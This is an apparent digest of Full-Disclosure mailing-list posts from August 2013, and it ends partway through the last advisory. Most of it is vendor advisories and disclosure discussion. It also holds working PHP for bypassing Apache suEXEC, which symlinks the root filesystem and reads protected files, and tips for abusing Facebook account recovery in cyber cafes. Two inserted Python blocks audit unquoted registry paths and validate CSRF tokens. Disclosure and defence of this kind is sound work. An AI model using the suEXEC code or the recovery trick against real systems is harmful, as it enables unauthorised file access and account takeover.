Re: [Full-disclosure] Facebook allows disclosure of friends list.
Answer to your queries:

Yes, you are correct: it works on an account which has been accessed once from that IP. If you are using multiple PCs, then it works on any of those machines.

You need to click "No longer have access to this" (3rd image). Apologies for that.

Works like a charm in cyber cafes, esp. when users don't clear their emails after logging out. Obtaining the email can be done via SE, or you can obtain your friends' email address using yahoo services.

Regards

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Defense in depth -- the Microsoft way (part 6): beginner's errors, QA sound asleep or out of sight!
Hi,

the installation of Microsoft's much acclaimed security tool EMET 3.0 (see http://www.microsoft.com/emet and http://support.microsoft.com/kb/2458544) creates the following VULNERABLE registry entry that runs a rogue program C:\PROGRA.EXE (as well as C:\Program Files.exe on x64) in the security context of the user logging on:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
EMET Notifier=C:\\Program Files\\EMET\\EMET_notifier.exe          ; x86
EMET Notifier=C:\\Program Files (x86)\\EMET\\EMET_notifier.exe    ; x64

JFTR: the vulnerability is caused by one of Windows' documented (see http://msdn.microsoft.com/library/ms682425.aspx) idiosyncrasies: CreateProcess() does NOT fail on calls with arguments like

C:\Program Files\Common Files\Microsoft Shared\filename[.extension]

but tries to execute

C:\Progra.exe
C:\Program Files\Common.exe
C:\Program Files\Common Files\Microsoft.exe
C:\Program Files\Common Files\Microsoft Shared\filename[.extension]

in turn to cover BEGINNER'S ERRORS of incapable developers who are unable to handle long pathnames with embedded spaces properly.

Whoever decided to implement this idiosyncrasy some 20 years ago was but incapable too and did not recognize the consequences of this idiosyncrasy^Widiotic behaviour!

The same beginner's error is (for example) present in all versions of Microsoft Security Essentials before 4.2 and was just recently fixed with https://support.microsoft.com/kb/2805304:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Security Client]
UninstallString=C:\\Program Files\\Microsoft Security Client\\Setup.exe /X

Some of Microsoft's developers (and of course their QA) apparently don't know their company's own documentation; cf. http://msdn.microsoft.com/library/ms997548.aspx:

| The path you supply to Uninstall-String must be the complete
| command line used to carry out your uninstall program.
JFTR: add/remove programs of current versions of Windows (XP SP2 and newer) mitigates this error and inserts missing quotes after the first filename or filename.extension and in front of the string. This kludge is but NOT documented!

https://support.microsoft.com/kb/2781197 resp. https://support.microsoft.com/kb/2823482 alias https://technet.microsoft.com/security/bulletin/ms13-034 fixed another unquoted pathname in Windows Defender on Windows 8, while https://support.microsoft.com/kb/2847927 alias https://technet.microsoft.com/security/bulletin/ms13-058 fixed it in Windows Defender on Windows 7 and Windows Server 2008 R2, where this beginner's error allowed the execution of a rogue program C:\PROGRA.EXE in the security context of LocalSystem.

On a fully patched Windows 7 x64 take a look at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{37efd44d-ef8d-41b1-940d-96973a50e9e0}\Shell\Open\Command]
@=expand:%ProgramFiles%\\Windows Sidebar\\sidebar.exe /showGadgets

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DesktopBackground\Shell\Gadgets\command]
@=C:\\Program Files\\Windows Sidebar\\sidebar.exe /showGadgets

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaServer:1\shell\Open Media Player\command]
@=expand:C:\\Program Files\\Windows Media Player\\wmplayer.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Windows.gadget\shell\open\command]
@=expand:%ProgramFiles%\\Windows Sidebar\\Sidebar.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\Windows Media Player\shell\open\command]
@=expand:%ProgramFiles(x86)%\\Windows Media Player\\wmplayer.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
@=C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SideShow\Gadgets\{591248b9-ad35-47c2-b2fa-2d7c120adc79}]
StartCommand=expand:%programFiles%\\Windows Media Player\\WMPSideShowGadget.exe

[HKEY_CURRENT_USER\Software\Microsoft\Keyboard\Native Media Players\WMP]
ExePath=C:\\Program Files\\Windows Media Player\\wmplayer.exe

On a fully patched Windows XP take a look at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\MPlayer2]
Player.Path=C:\\Program Files\\Windows Media Player\\mplayer2.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer]
Player.Path=C:\\Program Files\\Windows Media Player\\wmplayer.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\open\command]
@=C:\\Program Files\\Windows Media Player\\wmplayer.exe /Open %L

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\play\command]
@=C:\\Program Files\\Windows Media Player\\wmplayer.exe /Play %L

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSDASC\shell\open\command]
@=Rundll32.exe C:\\Program Files\\Common Files\\System\\OLE DB\\oledb32.dll,OpenDSLFile %1

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfo.Document\Shell\Open\Command]
@=C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\MSInfo32.exe /msinfo_file %1
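The CreateProcess() search order the post describes is mechanical enough to check for. The following is an added example (not code from the post, from Microsoft, or from EMET) that applies the documented rule to a handful of constructed registry values shaped like the ones quoted above, lists the rogue paths that would win if they existed, and shows the quoted form that the Add/Remove Programs kludge inserts. The "HKLM\...\" key names are abbreviated placeholders, the environment table is constructed, and nothing here touches a live registry; it runs anywhere Python runs.

```python
import re

# Constructed sample in the shape of the Run / Uninstall / shell\open\command
# values quoted in the post. The "HKLM\..." key paths are abbreviated
# placeholders, not real registry paths.
SAMPLE_VALUES = {
    r"HKLM\...\Run\EMET Notifier":
        r"C:\Program Files\EMET\EMET_notifier.exe",
    r"HKLM\...\Uninstall\Microsoft Security Client\UninstallString":
        r"C:\Program Files\Microsoft Security Client\Setup.exe /X",
    r"HKLM\...\Classes\Windows.gadget\shell\open\command":
        r"expand:%ProgramFiles%\Windows Sidebar\Sidebar.exe",
    r"HKLM\...\StartMenuInternet\IEXPLORE.EXE\shell\open\command":
        r'"C:\Program Files (x86)\Internet Explorer\iexplore.exe"',
}

# Constructed environment used to expand REG_EXPAND_SZ ("expand:") values.
SAMPLE_ENV = {
    "ProgramFiles": r"C:\Program Files",
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
}


def expand_value(value, env):
    """Drop the 'expand:' marker and substitute %VAR% from env (unknown vars are kept)."""
    if value.lower().startswith("expand:"):
        value = value[len("expand:"):]
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), value)


def createprocess_candidates(cmdline):
    """Executables CreateProcess() tries, in order, for an unquoted command line.

    Per the documented rule each space-delimited prefix is tried with .exe
    appended until a file is found. Offline we cannot stat C:, so the walk
    stops at the first prefix that already ends in .exe (the intended program).
    A command line that starts with a double quote yields a single candidate.
    """
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return [s[1:end] if end > 0 else s[1:]]
    words = s.split(" ")
    candidates = []
    for i in range(1, len(words) + 1):
        prefix = " ".join(words[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def rogue_candidates(value, env=SAMPLE_ENV):
    """Paths that would run instead of the intended program if they existed."""
    return createprocess_candidates(expand_value(value, env))[:-1]


def quote_command(value):
    """Return the command line with the program path wrapped in double quotes."""
    s = value.lstrip()
    if s.startswith('"'):
        return s
    intended = createprocess_candidates(s)[-1]
    if not s.lower().startswith(intended.lower()):
        return '"' + s + '"'  # no .exe anywhere: quote the whole thing
    return '"' + intended + '"' + s[len(intended):]


def audit_values(values, env=SAMPLE_ENV):
    """Map each value name to its rogue candidate list (empty means safe)."""
    return {name: rogue_candidates(data, env) for name, data in values.items()}


if __name__ == "__main__":
    for name, rogue in audit_values(SAMPLE_VALUES).items():
        print(("VULNERABLE" if rogue else "ok        ") + " " + name)
        for path in rogue:
            print("           would run " + path + " first")
        if rogue:
            fixed = quote_command(expand_value(SAMPLE_VALUES[name], SAMPLE_ENV))
            print("           quoted form: " + fixed)
```

On a real machine the same walk would be run over the Run, RunOnce, Uninstall and shell\open\command keys, and every rogue candidate whose parent directory is writable by a non-administrator is a finding; the quoted form is what the value should have contained in the first place.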
[Full-disclosure] Attacking Google Accounts with 'weblogin:' Tokens
For those who missed it, I would like to spread awareness about how conveniences built into the Google eco-system can allow an application, a physical user, or a forensics expert to access almost everything in your Google account.

[LINKS]

A nice summary from Lucian Constantine:
http://www.pcworld.com/article/2045903/android-oneclick-google-authentication-method-puts-users-businesses-at-risk.html

Intro Blog:
http://www.tripwire.com/state-of-security/off-topic/defcon-sneak-peek-how-risky-is-google-apps-for-your-business/

DEF CON 21 slides are here:
http://secur3.us/DC21Slides.pdf

Brief Demo Recording:
http://secur3.us/DC21-ShortDemo.mp4

Android PoC here:
http://secur3.us/DC21-PoC.apk

PoC Source here:
http://secur3.us/DC21-PoC.java

Please note that the app will send your token to my server. I am not doing anything with them but it will log your account names on my server.

I would like to encourage all Android AV vendors to strive to block not just this app but any app which is sending tokens off the device.

I am also recommending that any Google Apps administrator accounts should not be used with Android devices -- you wouldn't browse web sites and run untrusted code as root, would you? (i.e. follow the principle of least permission)

My proof of concept used Android with AccountManager API calls but this threat extends beyond Android and likely onto anything which will run Chrome. For example, iPhone/iPad support the same feature I am abusing according to Google:
http://www.google.com/intl/en/chrome/browser/mobile/ios.html

and Mac/PC Chrome also definitely supports this as outlined by Duo Security's recent blog post:
https://blog.duosecurity.com/2013/08/beyond-google-application-specific-password-exploiting-google-chromes-stored-oauth2-tokens/

Thanks,
Craig Young
Senior Security Researcher, Tripwire VERT
Follow: @CraigTweets
[Full-disclosure] [ MDVSA-2013:210 ] firefox
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:210
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : firefox
 Date    : August 7, 2013
 Affected: Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple security issues were identified and fixed in mozilla firefox:

 Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code (CVE-2013-1701).

 Mozilla security researcher moz_bug_r_a4 reported that through an interaction of frames and browser history it was possible to make the browser believe attacker-supplied content came from the location of a previous page in browser history. This allows for cross-site scripting (XSS) attacks by loading scripts from a misrepresented malicious site through relative locations and the potential access of stored credentials of a spoofed site (CVE-2013-1709).

 Mozilla security researcher moz_bug_r_a4 reported a mechanism to execute arbitrary code or a cross-site scripting (XSS) attack when a Certificate Request Message Format (CRMF) request is generated in certain circumstances (CVE-2013-1710).

 Security researcher Cody Crews reported that some Javascript components will perform checks against the wrong uniform resource identifier (URI) before performing security sensitive actions. This will return an incorrect location for the originator of the call. This could be used to bypass same-origin policy, allowing for cross-site scripting (XSS) or the installation of malicious add-ons from third-party pages (CVE-2013-1713).

 Mozilla community member Federico Lanusse reported a mechanism where a web worker can violate same-origin policy and bypass cross-origin checks through XMLHttpRequest. This could allow for cross-site scripting (XSS) attacks by web workers (CVE-2013-1714).

 Security researcher Georgi Guninski reported an issue with Java applets where in some circumstances the applet could access files on the local system when loaded using a file:/// URI and violate file origin policy due to interaction with the codebase parameter. This affects applets running on the local file system. Mozilla developer John Schoenick later discovered that fixes for this issue were inadequate and allowed the invocation of Java applets to bypass security checks in additional circumstances. This could lead to untrusted Java applets having read-only access on the local file system if used in conjunction with a method to download a file to a known or guessable path (CVE-2013-1717).

 The mozilla firefox packages have been upgraded to the latest ESR version (17.0.8) which is unaffected by these security flaws.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1701
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1709
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1710
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1713
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1714
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1717
 http://www.mozilla.org/security/announce/2013/mfsa2013-63.html
 http://www.mozilla.org/security/announce/2013/mfsa2013-68.html
 http://www.mozilla.org/security/announce/2013/mfsa2013-69.html
 http://www.mozilla.org/security/announce/2013/mfsa2013-72.html
 http://www.mozilla.org/security/announce/2013/mfsa2013-73.html
 http://www.mozilla.org/security/announce/2013/mfsa2013-75.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 46ceb0ccb376702e10d5686b24955fab  mes5/i586/firefox-17.0.8-0.1mdvmes5.2.i586.rpm
 3f3645b0900378ef1bce58fca5ae129c  mes5/i586/firefox-af-17.0.8-0.1mdvmes5.2.i586.rpm
 5a5d166e6d90d0f777e41c0e45b9ce4e  mes5/i586/firefox-ar-17.0.8-0.1mdvmes5.2.i586.rpm
 0f90909e08052d28fe6b26ca7c913f4e  mes5/i586/firefox-be-17.0.8-0.1mdvmes5.2.i586.rpm
 aa3976b6a51f00949c3b589abf87f0f2  mes5/i586/firefox-bg-17.0.8-0.1mdvmes5.2.i586.rpm
 f58486e6bc5071825bd6e8e6ce2145bf  mes5/i586/firefox-bn-17.0.8-0.1mdvmes5.2.i586.rpm
 82b455ccd6a14d15a2fc9c4bcd6e977d  mes5/i586/firefox-ca-17.0.8-0.1mdvmes5.2.i586.rpm
 19f86d829880f9b2af4c400222c1e533  mes5/i586/firefox-cs-17.0.8-0.1mdvmes5.2.i586.rpm
 d8b0b922b813a7eecd9175b191e55426  mes5/i586/firefox-cy-17.0.8-0.1mdvmes5.2.i586.rpm
 f83f4472c502a72abf51dfb0c1e20a2c  mes5/i586/firefox-da-17.0.8-0.1mdvmes5.2.i586.rpm
Re: [Full-disclosure] Facebook allows disclosure of friends list.
It does not work for all accounts. For example FB will ask me for the security question; all I can do is enter it or abort the recovery process (no option to skip it).

On 2013-08-06 20:12, Bhavesh Naik wrote:
> Answer to your queries:
>
> Yes, you are correct: it works on an account which has been accessed once from that IP. If you are using multiple PCs, then it works on any of those machines.
>
> You need to click "No longer have access to this" (3rd image). Apologies for that.
>
> Works like a charm in cyber cafes, esp. when users don't clear their emails after logging out. Obtaining the email can be done via SE, or you can obtain your friends' email address using yahoo services.
>
> Regards
Re: [Full-disclosure] [ MDVSA-2013:210 ] firefox
On Wed, Aug 07, 2013 at 12:36:01PM +0200, secur...@mandriva.com wrote:
> Security researcher Georgi Guninski reported an issue with Java

Just to clarify: I haven't reported _any_ issues to mozilla in years...

They are not fast in fixing bugs, especially when involving other vendors.

If I get pissed off, will try to find the dates about the issue in question (suspect since at least 4 years).
[Full-disclosure] [SECURITY] [DSA 2735-1] iceweasel security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2735-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
August 07, 2013                        http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-1701 CVE-2013-1709 CVE-2013-1710 CVE-2013-1713
                 CVE-2013-1714 CVE-2013-1717

Multiple security issues have been found in Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory safety errors, missing permission checks and other implementation errors may lead to the execution of arbitrary code, cross-site scripting, privilege escalation, bypass of the same-origin policy or the installation of malicious addons.

The Iceweasel version in the oldstable distribution (squeeze) is no longer supported with security updates.

For the stable distribution (wheezy), these problems have been fixed in version 17.0.8esr-1~deb7u1.

For the unstable distribution (sid), these problems have been fixed in version 17.0.8esr-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlICVeQACgkQXm3vHE4uylpxcwCg0aSZ2guURbRwOCvlMCEX8SLM
6d8AoJ+EWsZdjm/dtFxRNQ4QYgPrGC92
=tept
-----END PGP SIGNATURE-----
[Full-disclosure] Apache suEXEC privilege elevation / information disclosure
Apache suEXEC privilege elevation / information disclosure
Discovered by Kingcope/Aug 2013

The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs.

With this bug an attacker who is able to run php or cgi code inside a web hosting environment, where the environment is configured to use suEXEC as a protection mechanism, is able to read any file and directory on the filesystem of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user-id inside a suEXEC configured environment.

Take for example this apache owned file and the php script that follows.

$ ls -la /etc/testapache
-rw------- 1 www-data www-data 36 Aug  7 16:28 /etc/testapache

only user www-data should be able to read this file.

$ cat test.php
<?php
system("id; cat /etc/testapache");
?>

When calling the php file using a webbrowser it will show...

uid=1002(example) gid=1002(example) groups=1002(example)

because the php script is run through suEXEC. The script will not output the file requested because of a permissions error.

Now if we create a .htaccess file with the content...

Options Indexes FollowSymLinks

and a php script with the content...

<?php
system("ln -sf / test99.php");
symlink("/", "test99.php"); // try builtin function in case when
                            // system() is blocked
?>

in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'.

A request to test99.php/etc/testapache done with a web browser shows..

voila! read with the apache uid/gid

The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case.

Version notes. Assumed is that all Apache versions are affected by this bug.

apache2 -V
Server version: Apache/2.2.22 (Debian)
Server built:   Mar  4 2013 21:32:32
Server's Module Magic Number: 20051115:30
Server loaded:  APR 1.4.6, APR-Util 1.4.1
Compiled using: APR 1.4.6, APR-Util 1.4.1
Architecture:   32-bit
Server MPM:     Worker
  threaded:     yes (fixed thread count)
    forked:     yes (variable process count)
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/worker"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/etc/apache2"
 -D SUEXEC_BIN="/usr/lib/apache2/suexec"
 -D DEFAULT_PIDLOG="/var/run/apache2.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="mime.types"
 -D SERVER_CONFIG_FILE="apache2.conf"

Cheers,
/Kingcope
[Full-disclosure] Cisco Security Advisory: Cisco TelePresence System Default Credentials Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Cisco Security Advisory: Cisco TelePresence System Default Credentials Vulnerability

Advisory ID: cisco-sa-20130807-tp

Revision 1.0

For Public Release 2013 August 7 16:00 UTC (GMT)

Summary
=======

A vulnerability in Cisco TelePresence System could allow a remote attacker to access the web server via a user account that is created with default credentials.

The vulnerability is due to a default user account being created at installation time. An attacker could exploit this vulnerability by remotely accessing the web server and using the default account credentials. An exploit could allow the attacker to log in with the default credentials, which gives them full administrative rights to the system.

Workarounds that mitigate this vulnerability are available.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130807-tp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.19 (Darwin)

iF4EAREKAAYFAlICRBYACgkQUddfH3/BbTrGqQD+I5Yf/eVxV/vsUxX31XHDrLG+
NxwiFn3e1mDPMir9pGIA/jTzkeCxTTGMm5brlUQTFE0YJ3vDzXwAtp+HVzqu8i6K
=tMib
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
hi...

I posted the advisory to make administrators aware that it will be still possible to read files with the apache uid even when suEXEC is in place. suEXEC is installed on many hosting providers.

I read the cpanel site describing the patches [1], though standard apache httpd does not have these patches installed.

SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive.

If a hacker sees an apache installation using suEXEC, from an attacker's perspective it does not matter where the bug resides, either in Apache or in suEXEC. He just wants to circumvent the suEXEC protection so he can go the way described in the text I posted. This will aid him to escalate privileges further.

[1] http://docs.cpanel.net/twiki/bin/vief/EasyApache/Apache/SymlinkPatch#Frequently%20Asked%20Questions
[Full-disclosure] Updated [CVE-2013-2136] Apache CloudStack Cross-site scripting (XSS) vulnerability
Issued: August 6, 2013
Updated: August 7, 2013

Product: Apache CloudStack
Vendor: The Apache Software Foundation
Vulnerability Type(s): Cross-site scripting (XSS)
Vulnerable version(s): Apache CloudStack versions 4.0.0-incubating, 4.0.1-incubating, 4.0.2 and 4.1.0
CVE References: CVE-2013-2136
Risk Level: Low
CVSSv2 Base Scores: 4 (AV:N/AC:L/Au:S/C:N/I:P/A:N)

Description:
The Apache CloudStack Security Team was notified of an issue found in the Apache CloudStack user interface that allows an authenticated user to execute a cross-site scripting attack against other users within the system.

Mitigation:
Updating to Apache CloudStack versions 4.1.1 or higher will mitigate this vulnerability. Please see the 4.1.1 release notes for further information about how to upgrade:
http://cloudstack.apache.org/docs/en-US/Apache_CloudStack/4.1.1/html/Release_Notes/index.html

References:
https://issues.apache.org/jira/browse/CLOUDSTACK-2936

Credit:
This issue was identified by Oleg Boytsev from strongserver.org.
[Full-disclosure] [Security-news] SA-CONTRIB-2013-062 - RESTful Web Services (RESTWS) - Access Bypass
View online: https://drupal.org/node/2059603

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-062
   * Project: RESTful Web Services [1] (third-party module)
   * Version: 7.x
   * Date: 2013-August-07
   * Security risk: Moderately critical [2]
   * Exploitable from: Remote
   * Vulnerability: Access bypass

-------- DESCRIPTION ---------------------------------------------------------

This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF.

The module doesn't sufficiently check for field level access when performing entity write operations on POST and PUT requests. It also does not check the allowed filter formats for a user for formatted text fields, thereby allowing an attacker to exploit XSS with a format that displays full HTML or even PHP code execution with a PHP code format.

This vulnerability is mitigated by the fact that an attacker must have a role with a RESTWS permission such as "access resource node" and a permission to write entities such as "create page content". PHP code execution is only possible if the PHP module is enabled.

-------- CVE IDENTIFIER(S) ISSUED --------------------------------------------

   * /A CVE identifier [3] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes./

-------- VERSIONS AFFECTED ---------------------------------------------------

   * RESTWS 7.x-1.x versions prior to 7.x-1.4.
   * RESTWS 7.x-2.x versions prior to 7.x-2.1.

Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

   * If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.4 [4]
   * If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.1 [5]

Also see the RESTful Web Services [6] project page.

-------- REPORTED BY ---------------------------------------------------------

   * Chris Oden [7]

-------- FIXED BY ------------------------------------------------------------

   * Klaus Purer [8] the module maintainer
   * Chris Oden [9]

-------- COORDINATED BY ------------------------------------------------------

   * Klaus Purer [10] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION ----------------------------------------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/restws
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] https://drupal.org/node/2059591
[5] https://drupal.org/node/2059593
[6] http://drupal.org/project/restws
[7] https://drupal.org/user/896508
[8] https://drupal.org/user/262198
[9] https://drupal.org/user/896508
[10] https://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration

_______________________________________________
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news
[Full-disclosure] [Security-news] SA-CONTRIB-2013-064 - Persona - Cross site request forgery (CSRF)
View online: https://drupal.org/node/2059599

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-064
   * Project: Mozilla Persona [1] (third-party module)
   * Version: 7.x
   * Date: 2013-August-07
   * Security risk: Less critical [2]
   * Exploitable from: Remote
   * Vulnerability: Cross Site Request Forgery

-------- DESCRIPTION ---------------------------------------------------------

This module enables users to sign into a Drupal website using Mozilla Persona [3].

The module uses a security token to ensure that a sign-in request is made from a web page that is participating in the current session. It was possible for a security token that was not of type string to be accepted as correct regardless of its value, thereby bypassing the protection against cross site request forgery.

This vulnerability is mitigated by the fact that an attacker can only cause a victim to become signed in to an account that the attacker already has the ability to sign in to.

-------- CVE IDENTIFIER(S) ISSUED --------------------------------------------

   * /A CVE identifier [4] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes./

-------- VERSIONS AFFECTED ---------------------------------------------------

   * Persona 7.x-1.x versions prior to 7.x-1.11

Drupal core is not affected. If you do not use the contributed Mozilla Persona [5] module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

   * If you use the Mozilla Persona module for Drupal 7.x, upgrade to Persona 7.x-1.11 [6]

Also see the Mozilla Persona [7] project page.

-------- REPORTED BY ---------------------------------------------------------

   * Heine Deelstra [8] of the Drupal Security Team

-------- FIXED BY ------------------------------------------------------------

   * Jonathan Brown [9], the module maintainer

-------- COORDINATED BY ------------------------------------------------------

   * Heine Deelstra [10] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION ----------------------------------------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/persona
[2] http://drupal.org/security-team/risk-levels
[3] https://www.mozilla.org/persona/
[4] http://cve.mitre.org/
[5] http://drupal.org/project/persona
[6] https://drupal.org/node/2058655
[7] http://drupal.org/project/persona
[8] https://drupal.org/user/17943
[9] https://drupal.org/user/46104
[10] https://drupal.org/user/17943
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
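The Persona advisory turns on a token check that accepted a non-string value. The following is an added example, written in Python rather than the module's PHP and not taken from the Persona module or the Drupal Security Team, of how a sign-in token check should treat a decoded request: the token must be a string of the expected length before it is ever compared, and the comparison is constant-time. The request bodies in demo() are constructed; the only assumption is that the client posts a JSON object with a "token" member, which is a hypothetical transport, not the module's.

```python
import hmac
import json
import secrets


def issue_token():
    """Per-session sign-in token; the server stores it in the session."""
    return secrets.token_hex(32)


def validate_sign_in_token(request_body, session_token):
    """Return (ok, reason). Only a str of the expected length that matches the
    session token in constant time is accepted; every other JSON type (true,
    0, [], null, {}) is rejected before any comparison happens."""
    try:
        data = json.loads(request_body)
    except (TypeError, ValueError):
        return False, "body is not JSON"
    if not isinstance(data, dict):
        return False, "body is not an object"
    token = data.get("token")
    if not isinstance(token, str):
        # A loose check that compared the raw value would be reached here;
        # rejecting on type closes the bypass described in the advisory.
        return False, "token is " + type(token).__name__ + ", not a string"
    if not isinstance(session_token, str) or len(token) != len(session_token):
        return False, "token length mismatch"
    if not hmac.compare_digest(token.encode(), session_token.encode()):
        return False, "token mismatch"
    return True, "ok"


def demo():
    """Run the check over constructed request bodies; only 'good' is legitimate."""
    session = issue_token()
    bodies = {
        "good": json.dumps({"token": session}),
        "bool": '{"token": true}',
        "int": '{"token": 0}',
        "list": '{"token": []}',
        "null": '{"token": null}',
        "missing": '{}',
        "wrong": json.dumps({"token": "a" * len(session)}),
        "garbage": "not json at all",
    }
    return {name: validate_sign_in_token(body, session) for name, body in bodies.items()}


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(("accept" if ok else "reject") + "  " + name + ": " + reason)
```

The reason strings are worth logging as-is: a token arriving as a boolean or an empty array is not something a legitimate sign-in page sends, so a burst of "not a string" rejections is a useful signal that someone is probing the check.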
[Full-disclosure] [Security-news] SA-CONTRIB-2013-063 - Authenticated User Page Caching (Authcache) - Information Disclosure
View online: https://drupal.org/node/2059589

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-063
   * Project: Authenticated User Page Caching (Authcache) [1] (third-party module)
   * Version: 7.x
   * Date: 2013-August-07
   * Security risk: Moderately critical [2]
   * Exploitable from: Remote
   * Vulnerability: Information Disclosure

-------- DESCRIPTION ---------------------------------------------------------

This module enables page caching for authenticated users. A separate version of each cacheable page is stored for each group of users with the same combination of roles.

Users having the exact same role combination as the superuser (uid=1) might access cached pages generated with the superuser. Therefore it might be possible that information intended only for the superuser is disclosed to those users.

This vulnerability is mitigated by the fact that an attacker must have the exact same role combination as the superuser.

-------- CVE IDENTIFIER(S) ISSUED --------------------------------------------

   * /A CVE identifier [3] will be requested, and added upon issuance, in
